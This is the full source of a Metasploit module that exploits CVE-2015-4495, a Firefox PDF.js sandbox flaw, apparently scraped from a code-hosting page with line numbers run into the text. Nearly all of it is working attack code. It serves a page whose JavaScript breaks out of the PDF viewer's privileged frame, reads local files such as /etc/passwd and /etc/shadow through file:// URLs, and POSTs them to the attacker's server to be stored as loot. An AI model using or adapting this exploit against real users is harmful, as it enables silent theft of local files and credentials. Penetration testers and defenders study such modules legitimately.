Path: blob/master/modules/auxiliary/gather/firefox_pdfjs_file_theft.rb
19567 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpServer::HTML7include Msf::Auxiliary::Report89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Firefox PDF.js Browser File Theft',14'Description' => %q{15This module abuses an XSS vulnerability in versions prior to Firefox 39.0.3, Firefox ESR1638.1.1, and Firefox OS 2.2 that allows arbitrary files to be stolen. The vulnerability17occurs in the PDF.js component, which uses Javascript to render a PDF inside a frame with18privileges to read local files. The in-the-wild malicious payloads searched for sensitive19files on Windows, Linux, and OSX. Android versions are reported to be unaffected, as they20do not use the Mozilla PDF viewer.21},22'Author' => [23'Unknown', # From an 0day served on Russian news website24'fukusa', # Hacker news member that reported the issue25'Unknown' # Metasploit module26],27'License' => MSF_LICENSE,28'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],29'PassiveActions' => [ 'WebServer' ],30'References' => [31['URL', 'https://paste.debian.net/290146'], # 0day exploit32['URL', 'https://news.ycombinator.com/item?id=10021376'], # discussion with discoverer33['URL', 'https://blog.mozilla.org/security/2015/08/06/firefox-exploit-found-in-the-wild/'],34['CVE', '2015-4495']35],36'DefaultAction' => 'WebServer',37'Notes' => {38'Reliability' => UNKNOWN_RELIABILITY,39'Stability' => UNKNOWN_STABILITY,40'SideEffects' => UNKNOWN_SIDE_EFFECTS41}42)43)4445register_options([46OptString.new('FILES', [47false,48'Comma-separated list of files to steal',49'/etc/passwd, /etc/shadow'50])51])5253register_advanced_options([54OptInt.new('PER_FILE_SLEEP', [55false,56'Milliseconds to wait before attempting to read the frame containing each file',5725058])59])60end6162def run63print_status("File targeted for exfiltration: #{JSON.generate(file_urls)}")64exploit65end6667def on_request_uri(cli, request)68if request.method.downcase == 'post'69print_status('Got POST request...')70process_post(cli, request)71send_response_html(cli, '')72else73print_status('Sending exploit...')74send_response_html(cli, html)75end76end7778def process_post(cli, req)79name = req.qstring['name']80print_good("Received #{name}, size #{req.body.bytes.length}...")81output = store_loot(82name || 'data', 'text/plain', cli.peerhost, req.body, 'firefox_theft', 'Firefox PDF.js exfiltrated file'83)84print_good("Stored to #{output}")85end8687def html88exploit_js = js + file_payload + '}, 20);'8990"<!doctype html><html><body><script>#{exploit_js}</script></body></html>"91end9293def backend_url94proto = (datastore['SSL'] ? 'https' : 'http')95my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']96port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"97resource = ('/' == get_resource[-1, 1]) ? get_resource[0, get_resource.length - 1] : get_resource9899"#{proto}://#{my_host}#{port_str}#{resource}/catch"100end101102def file_payload103%Q|104var files = (#{JSON.generate(file_urls)});105function next() {106var f = files.pop();107if (f) {108get("file://"+f, function() {109var data = get_data(this);110var x = new XMLHttpRequest;111x.open("POST", "#{backend_url}?name="+encodeURIComponent("%URL%"));112x.send(data);113}, #{datastore['PER_FILE_SLEEP']}, "%URL%", f);114setTimeout(next, #{datastore['PER_FILE_SLEEP']}+200);115}116}117next();118|119end120121def file_urls122datastore['FILES'].split(',').map(&:strip)123end124125def js126<<~EOJS127function xml2string(obj) {128return new XMLSerializer().serializeToString(obj);129}130131function __proto(obj) {132return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;133}134135function get(path, callback, timeout, template, value) {136callback = _(callback);137if (template && value) {138callback = callback.replace(template, value);139}140js_call1 = 'javascript:' + _(function() {141try {142open("%url%", "_self");143} catch (e) {144history.back();145}146undefined;147}, "%url%", path);148js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';149sandboxContext(_(function() {150i = document.getElementById('i');151p = __proto(i.contentDocument.styleSheets[0].ownerNode);152i2 = document.getElementById('i2');153l = p.__lookupSetter__.call(i2.contentWindow, 'location');154l.call(i2.contentWindow, window.wrappedJSObject.js_call1);155}));156setTimeout((function() {157sandboxContext(_(function() {158p = __proto(i.contentDocument.styleSheets[0].ownerNode);159l = p.__lookupSetter__.call(i2.contentWindow, 'location');160l.call(i2.contentWindow, window.wrappedJSObject.js_call2);161}));162}), timeout);163}164165function get_data(obj) {166data = null;167try {168data = obj.document.documentElement.innerHTML;169if (data.indexOf('dirListing') < 0) {170throw new Error();171}172} catch (e) {173if (this.document instanceof XMLDocument) {174data = xml2string(this.document);175} else {176try {177if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {178data = this.document.body.firstChild.textContent;179} else {180throw new Error();181}182} catch (e) {183try {184if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;185return null;186} else {187throw new Error();188}189} catch (e) {190;;191}192}193}194}195return data;196}197198function _(s, template, value) {199s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];200s = s.substring(0, s.length - 1);201if (template && value) {202s = s.replace(template, value);203}204s += __proto;205s += xml2string;206s += get_data;207s = s.replace(/\\s\\/\\/.*\\n/g, "");208s = s + ";undefined";209return s;210}211212function get_sandbox_context() {213if (window.my_win_id == null) {214for (var i = 0; i < 20; i++) {215try {216if (window[i].location.toString().indexOf("view-source:") != -1) {217my_win_id = i;218break;219}220} catch (e) {}221}222};223if (window.my_win_id == null)224return;225clearInterval(sandbox_context_i);226object.data = 'view-source:' + blobURL;227window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';228object.data = 'data:text/html,<'+'html/>';229window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+230'"position:absolute; left:-9999px;" onload = "'+_(function(){231window.wrappedJSObject.sandboxContext=(function(cmd) {232with(importFunction.constructor('return this')()) {233return eval(cmd);234}235});236}) + '"/>');237}238239240var i = document.createElement("iframe");241i.id = "i";242i.width=i.height=0;243i.style='position:absolute;left:-9999px;';244i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";245document.documentElement.appendChild(i);246i.onload = function() {247if (this.contentDocument.styleSheets.length > 0) {248var i2 = document.createElement("iframe");249i2.id = "i2";250i2.width=i2.height=0;251i2.style='position:absolute;left:-9999px;';252i2.src = "data:application/pdf,";253document.documentElement.appendChild(i2);254pdfBlob = new Blob([''], {255type: 'application/pdf'256});257blobURL = URL.createObjectURL(pdfBlob);258object = document.createElement('object');259object.data = 'data:application/pdf,';260object.onload = (function() {261sandbox_context_i = setInterval(get_sandbox_context, 200);262object.onload = null;263object.data = 'view-source:' + location.href;264return;265});266document.documentElement.appendChild(object);267} else {268this.contentWindow.location.reload();269}270}271272var kill = setInterval(function() {273if (window.sandboxContext) {274clearInterval(kill);275} else {276return;277}278EOJS279end280end281282283